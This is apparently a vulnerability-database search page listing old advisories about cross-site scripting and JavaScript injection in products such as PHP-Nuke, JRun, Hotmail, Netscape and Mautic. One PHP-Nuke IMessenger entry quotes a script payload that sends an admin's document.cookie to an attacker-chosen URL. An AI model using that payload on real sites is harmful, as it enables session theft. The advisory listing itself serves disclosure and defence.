Lucene search

4972 matches found

securityvulns
added 2002/01/23 12:0 a.m., 26 views

Cgisecurity Paper #4: Header Based Exploitation: Web Statistical Software Threats

Hello, Below is a paper I wrote on some threats that web statistical software faces in regards to header manipulation. I've decided to include 1 product affected by this to show that this is very possible. Product: w3perl Vendor: http://www.w3perl.com Patch: http://www.w3perl.com/download/ Upgrad...

0.2 AI score
Exploits 0

securityvulns
added 2001/12/19 12:0 a.m., 40 views

Cross-site scripting in Aktivate Shopping System (cross-site scripting)

JavaScript can be inserted into the request URL...

0.7 AI score
Exploits 0, References 1, Affected Software 1

securityvulns
added 2001/12/17 12:0 a.m., 28 views

Security hole in IMessenger (PHP-Nuke)

There is a big hole in imessenger im.php. It accepts javascript... if I send scriptwindow.location.href='http://www. SERVER.com/im.php?usernameto= MYNICK &subject='+ document.cookie +'&message=message&action=send' ;/script without '' to the admin, he sends his cookie. PHPNuke has been alerted...

7 AI score
Exploits 0

securityvulns
added 2001/08/31 12:0 a.m., 44 views

JavaScript in gnut (javascript injection)

The name of a shared file can contain HTML tags...

0.7 AI score
Exploits 0, References 1, Affected Software 1

securityvulns
added 2001/07/24 12:0 a.m., 56 views

Problems in proxomitron (cross-site scripting)

JavaScript can be inserted into the request URL...

0.6 AI score
Exploits 0, References 1

NVD
added 2001/07/02 4:0 a.m., 10 views

CVE-2001-1084

Cross-site scripting vulnerability in Allaire JRun 3.0 and 2.3.3 allows a malicious webmaster to embed Javascript in a request for a .JSP, .shtml, .jsp10, .jrun, or .thtml file that does not exist, which causes the Javascript to be inserted into an error message...

7.5 CVSS, 6.2 AI score, 0.00156 EPSS
Exploits 1, References 6

securityvulns
added 2001/02/10 12:0 a.m., 34 views

Problem in IE - scripts in binary files

Instead of checking the Content-Type field of the HTTP header, IE inspects the first bytes of the file and determines the type from them. If the file contains HTML tags, it will be treated as HTML, regardless of whether it conforms to other formats. This allows JavaScript to be embedded in binary files, for example images...

7.2 AI score
Exploits 0, References 1, Affected Software 1

securityvulns
added 2000/11/04 12:0 a.m., 24 views

Server compromise via URL (URL javascript)

A specially crafted URL can include JavaScript, which the attacked server will pass on to the client. In this way, access to the attacked server can be obtained in the context of the client...

0.2 AI score
Exploits 0, References 4, Affected Software 1

Packet Storm
added 2000/01/12 12:0 a.m., 33 views

hotmail.java.txt

Georgi Guninski security advisory 5, 2000 Yet another Hotmail security hole - injecting JavaScript using "jvascript:" Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski ...

7.4 AI score
Exploits 0

Packet Storm
added 2000/01/07 12:0 a.m., 27 views

javascript.hotmail.txt

Georgi Guninski security advisory 3, 2000 Yet another Hotmail security hole - injecting JavaScript in IE using "@import urljavascript:..." Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact...

7.4 AI score
Exploits 0

Packet Storm
added 1999/08/17 12:0 a.m., 22 views

netscape.viewtrack.txt

Date: Sun, 6 Jun 1999 13:15:08 +0300 From: Georgi Guninski To: [email protected] Subject: Netscape Communicator code injection in JavaScript console using "view-source:" protocol There is a bug in Netscape Communicator 4.6 Win95, 4.07 Linux probably all 4.x are affected, which allows sniffing...

7.4 AI score
Exploits 0

Friends Of PHP
added 1970/01/01 12:0 a.m., 18 views

Stored XSS vulnerability on Bounce Management Callback

Impact Insufficient sanitization / filtering allows for arbitrary JavaScript Injection in Mautic using the bounce management callback function. The values submitted in the "error" and "errorrelatedto" parameters of the POST request of the bounce management callback will be permanently stored and...

8.2 CVSS, 7.3 AI score, 0.00435 EPSS
Exploits 0, Affected Software 1